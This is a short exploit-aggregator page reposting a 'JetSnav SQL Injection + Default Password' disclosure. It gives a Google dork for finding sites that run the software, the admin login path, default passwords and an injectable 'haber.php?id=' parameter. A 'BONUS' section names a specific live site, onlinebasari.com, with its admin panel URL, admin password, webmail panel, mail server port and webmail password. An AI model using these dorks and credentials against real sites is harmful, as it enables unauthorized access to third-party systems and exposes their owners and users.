Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023050076

Below is a copy:

JetSnav SQL Injection + Default Password Vulnerability
Dork: allintext:"Powered by Jetsnav"
admin panel:/admin/login.php

in script 2 vuln

1)Default Password
2)SQL Injection

Default Password poc: 
dork in google search>select site

email: [email protected]
pass: demo (or) demox

SQL Injection poc:
select site and search id  
ex: haber.php?id=5 

no md5 hash no encrypt

BONUS - EXAMPLE
Admin Panel
Panel: https://onlinebasari.com/admin/login.php
E-Mail:[email protected]
ifre:demox

Webmail
Kullanc ad:  [email protected]
ifre:  onlinebasari.com
Webmail Panel: https://onlinebasari.com/webmail
Sunucu:  https://mail.onlinebasari.com:2080
Port: 2080

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.